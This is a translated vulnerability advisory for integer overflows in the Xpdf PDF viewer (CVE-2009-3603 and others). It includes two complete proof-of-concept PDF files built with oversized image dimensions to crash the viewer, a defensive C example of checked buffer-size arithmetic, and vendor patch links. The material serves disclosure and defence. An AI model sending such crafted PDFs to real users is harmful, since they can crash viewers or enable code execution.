Xpdf Multiple Integer Overflow Vulnerabilities

Release date: 2009-10-15
Updated: 2009-10-20

Affected systems:
Xpdf 3.x
Unaffected systems:
Xpdf 3.02 pl4
Description:
BUGTRAQ  ID: 36703
CVE(CAN) ID: CVE-2009-3603,CVE-2009-3604,CVE-2009-3606,CVE-2009-3608,CVE-2009-3609

Xpdf is an open-source viewer for Portable Document Format (PDF) files.

Multiple integer overflows in Xpdf's SplashBitmap::SplashBitmap(), ObjectStream::ObjectStream(), Splash::drawImage() and PSOutputDev::doImageL1Sep() functions can lead to heap overflows: each computes a buffer size from values taken straight from the document (an image's width and height, for instance), the multiplication wraps in 32-bit integer arithmetic, and the undersized buffer that results is then written past its end. A user tricked into opening a malicious PDF document can trigger these overflows, crashing the viewer or executing arbitrary code with the user's privileges.

<*Source: Adam Zabrocki (pi3ki31ny@wp.pl)
  
  Links: http://secunia.com/advisories/37053/
        http://site.pi3.com.pl/adv/xpdf.txt
        https://www.redhat.com/support/errata/RHSA-2009-1513.html
        https://www.redhat.com/support/errata/RHSA-2009-1512.html
        https://www.redhat.com/support/errata/RHSA-2009-1504.html
        https://www.redhat.com/support/errata/RHSA-2009-1503.html
        https://www.redhat.com/support/errata/RHSA-2009-1502.html
        https://www.redhat.com/support/errata/RHSA-2009-1501.html
        https://www.redhat.com/support/errata/RHSA-2009-1500.html
*>

Test method:

Warning

The following programs (methods) may be offensive in nature and are provided solely for security research and teaching. Use at your own risk!

[1] - NULL pointer dereference:

-------------- xpdf-poc-null-pointer-dereference.pdf -------------
%PDF-1.3
% 'BasicFonts': class PDFDictionary
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R >>
endobj
% 'F1': class PDFType1Font
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
/Encoding /WinAnsiEncoding
/Name /F1
/Subtype /Type1
/Type /Font >>
endobj
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject
3 0 obj
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 0 >>
stream
GarPPGWE%h$j7l8U/<b)7aWX$5Y7NE=r1HcE+b-(;)F/"d9oEm?)I\-b23C~>endstream

endobj
% 'Page1': class PDFPage
4 0 obj
% Page dictionary
<< /Contents 8 0 R
/MediaBox [ 0
0
595.2756
841.8898 ]
/Parent 7 0 R
/Resources << /Font 1 0 R
/ProcSet [ /PDF
/Text
/ImageB
/ImageC
/ImageI ]
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>
/Rotate 0
/Trans <<  >>
/Type /Page >>
endobj
% 'R5': class PDFCatalog
5 0 obj
% Document Root
<< /Outlines 9 0 R
/PageMode /UseNone
/Pages 7 0 R
/Type /Catalog >>
endobj
% 'R6': class PDFInfo
6 0 obj
<< /Author (anonymous)
/CreationDate (20090525000415)
/Keywords ()
/Producer (ReportLab http://www.reportlab.com)
/Subject (unspecified)
/Title (untitled) >>
endobj
% 'R7': class PDFPages
7 0 obj
% page tree
<< /Count 1
/Kids [ 4 0 R ]
/Type /Pages >>
endobj
% 'R8': class PDFStream
8 0 obj
% page stream
<< /Filter [ /ASCII85Decode
/FlateDecode ]
/Length 137 >>
stream
Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964 () g>'<K)ZW1TUhKc(%
Rpp=t5hkIT:&HH9nYhU`6Inl-6"Js0J5ePfhLZm8G)YG;4cqkJ;Rf)cZMkCEB*ZoFeK5S8`19G:#!aWM18.~>endstream

endobj
% 'R9': class PDFOutlines
9 0 obj
<< /Count 0
/Type /Outlines >>
endobj
xref
0 10
0000000000 65535 f
0000000113 00000 n
0000000209 00000 n
0000000415 00000 n
0000000710 00000 n
0000001052 00000 n
0000001186 00000 n
0000001397 00000 n
0000001502 00000 n
0000001783 00000 n
trailer
<< /ID
% ReportLab generated PDF document -- digest
(http://www.reportlab.com)
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b
\372\015\305\017\211\022\241\262?\243\347)]

/Info 6 0 R
/Root 5 0 R
/Size 10 >>
startxref
1834
%%EOF
-------------- xpdf-poc-null-pointer-dereference.pdf -------------


[2] - Integer overflow:

-------------- xpdf-poc-integer-overflow.pdf -------------
%PDF-1.3
% 'BasicFonts': class PDFDictionary
1 0 obj
% The standard fonts dictionary
<< /F1 2 0 R >>
endobj
% 'F1': class PDFType1Font
2 0 obj
% Font Helvetica
<< /BaseFont /Helvetica
/Encoding /WinAnsiEncoding
/Name /F1
/Subtype /Type1
/Type /Font >>
endobj
% 'FormXob.322a89588a84510d9b1b6ec68c3b4437': class PDFImageXObject
3 0 obj
<< /BitsPerComponent 8
/ColorSpace /DeviceRGB
/Filter [ /ASCII85Decode
/FlateDecode ]
/Height 2000000000
/Length 61
/Subtype /Image
/Type /XObject
/Width 1102 >>
stream
GarPPGWE%h$j7l8U/<b)7aWX$5Y7NE=r1HcE+b-(;)F/"d9oEm?)I\-b23C~>endstream

endobj
% 'Page1': class PDFPage
4 0 obj
% Page dictionary
<< /Contents 8 0 R
/MediaBox [ 0
0
595.2756
841.8898 ]
/Parent 7 0 R
/Resources << /Font 1 0 R
/ProcSet [ /PDF
/Text
/ImageB
/ImageC
/ImageI ]
/XObject << /FormXob.322a89588a84510d9b1b6ec68c3b4437 3 0 R >> >>
/Rotate 0
/Trans <<  >>
/Type /Page >>
endobj
% 'R5': class PDFCatalog
5 0 obj
% Document Root
<< /Outlines 9 0 R
/PageMode /UseNone
/Pages 7 0 R
/Type /Catalog >>
endobj
% 'R6': class PDFInfo
6 0 obj
<< /Author (anonymous)
/CreationDate (20090525000415)
/Keywords ()
/Producer (ReportLab http://www.reportlab.com)
/Subject (unspecified)
/Title (untitled) >>
endobj
% 'R7': class PDFPages
7 0 obj
% page tree
<< /Count 1
/Kids [ 4 0 R ]
/Type /Pages >>
endobj
% 'R8': class PDFStream
8 0 obj
% page stream
<< /Filter [ /ASCII85Decode
/FlateDecode ]
/Length 137 >>
stream
Gap(;0b2&S&-VlomLT2HjNbIbQSsFp1e964 () g>'<K)ZW1TUhKc(%
Rpp=t5hkIT:&HH9nYhU`6Inl-6"Js0J5ePfhLZm8G)YG;4cqkJ;Rf)cZMkCEB*ZoFeK5S8`19G:#!aWM18.~>endstream

endobj
% 'R9': class PDFOutlines
9 0 obj
<< /Count 0
/Type /Outlines >>
endobj
xref
0 10
0000000000 65535 f
0000000113 00000 n
0000000209 00000 n
0000000415 00000 n
0000000710 00000 n
0000001052 00000 n
0000001186 00000 n
0000001397 00000 n
0000001502 00000 n
0000001783 00000 n
trailer
<< /ID
% ReportLab generated PDF document -- digest
(http://www.reportlab.com)
[(xZ\271\226b\372\015\305\017\211\022\241\262?\243\347) (xZ\271\226b
\372\015\305\017\211\022\241\262?\243\347)]

/Info 6 0 R
/Root 5 0 R
/Size 10 >>
startxref
1834
%%EOF

-------------- xpdf-poc-integer-overflow.pdf -------------
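The two PoC files above differ only in the image's /Width (0 versus 1102); both carry /Height 2000000000. The C program below is an added illustration for the description and for those two dictionaries, not Xpdf's code and not the vendor's fix: it shows the unchecked 32-bit size computation that the description refers to beside a checked version, and runs both over single-line copies of the PoC image dictionaries (constructed here; the real objects span several lines). It assumes 3 bytes per pixel, which follows from /DeviceRGB with /BitsPerComponent 8; dict_int, checked_rgb_size and image_dict_is_suspicious are illustrative names, and dict_int is a key lookup, not a PDF parser.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* /DeviceRGB with /BitsPerComponent 8, as in both PoC dictionaries. */
#define BYTES_PER_PIXEL 3

/* Unchecked pattern: the buffer size is formed in 32 bits and wraps.
 * Modelled with uint32_t so the wrap is well-defined here; the vulnerable
 * pattern does it with plain int, where overflow is undefined behaviour. */
uint32_t unchecked_rgb_size(int width, int height)
{
    uint32_t row = (uint32_t)width * BYTES_PER_PIXEL;
    return row * (uint32_t)height;
}

/* How many bytes a decoder would actually write for those dimensions. */
uint64_t true_rgb_size(int width, int height)
{
    return (uint64_t)width * BYTES_PER_PIXEL * (uint64_t)height;
}

/* Hardened pattern: refuse non-positive dimensions and any product that
 * does not fit in int, checking before each multiply. Returns the size,
 * or -1 when the dimensions are rejected. */
long long checked_rgb_size(int width, int height)
{
    if (width <= 0 || height <= 0)
        return -1;
    if (width > INT_MAX / BYTES_PER_PIXEL)
        return -1;
    int row = width * BYTES_PER_PIXEL;
    if (height > INT_MAX / row)
        return -1;
    return (long long)row * height;
}

/* Read the integer following a key such as "/Width" in an image
 * dictionary. Enough for the PoC dictionaries; it is not a PDF parser.
 * Returns -1 if the key is absent. */
long dict_int(const char *dict, const char *key)
{
    const char *p = strstr(dict, key);
    if (p == NULL)
        return -1;
    return strtol(p + strlen(key), NULL, 10);
}

/* 1 if the checked path would reject this image dictionary, else 0. */
int image_dict_is_suspicious(const char *dict)
{
    long w = dict_int(dict, "/Width");
    long h = dict_int(dict, "/Height");
    if (w < 0 || h < 0 || w > INT_MAX || h > INT_MAX)
        return 1;
    return checked_rgb_size((int)w, (int)h) < 0;
}

/* Constructed single-line copies of the image dictionaries in the two
 * PoC files above, plus a sane dictionary for comparison. */
static const char *const POC_OVERFLOW =
    "<< /BitsPerComponent 8 /ColorSpace /DeviceRGB /Height 2000000000 "
    "/Subtype /Image /Type /XObject /Width 1102 >>";
static const char *const POC_NULL =
    "<< /BitsPerComponent 8 /ColorSpace /DeviceRGB /Height 2000000000 "
    "/Subtype /Image /Type /XObject /Width 0 >>";
static const char *const SANE =
    "<< /BitsPerComponent 8 /ColorSpace /DeviceRGB /Height 1000 "
    "/Subtype /Image /Type /XObject /Width 1102 >>";

static void report(const char *name, const char *dict)
{
    long w = dict_int(dict, "/Width"), h = dict_int(dict, "/Height");
    printf("%s: %ldx%ld wrapped=%u true=%llu checked=%lld suspicious=%d\n",
           name, w, h, unchecked_rgb_size((int)w, (int)h),
           (unsigned long long)true_rgb_size((int)w, (int)h),
           checked_rgb_size((int)w, (int)h), image_dict_is_suspicious(dict));
}

int main(void)
{
    report("poc-integer-overflow", POC_OVERFLOW);
    report("poc-null-pointer", POC_NULL);
    report("sane", SANE);
    return 0;
}
```

For the 1102 x 2000000000 dictionary the 32-bit product wraps to 2045331456 while a decoder would write 6612000000000 bytes, so any buffer sized by the wrapped value is overrun as soon as rows are decoded into it; for the /Width 0 dictionary the product is 0, a zero-length allocation whose use as a bitmap is what PoC [1] labels a NULL pointer dereference. The checked version rejects both dictionaries before any allocation and accepts the 1102 x 1000 one with 3306000 bytes.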

Recommendations:
Vendor patches:

RedHat
------
RedHat has released a security advisory (RHSA-2009:1500-01) and the corresponding patches:
RHSA-2009:1500-01: Important: xpdf security update
Link: https://www.redhat.com/support/errata/RHSA-2009-1500.html

Xpdf
----
The vendor has released an update (Xpdf 3.02 pl4) that fixes these issues; download it from the vendor's homepage:

http://www.foolabs.com/xpdf/

This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.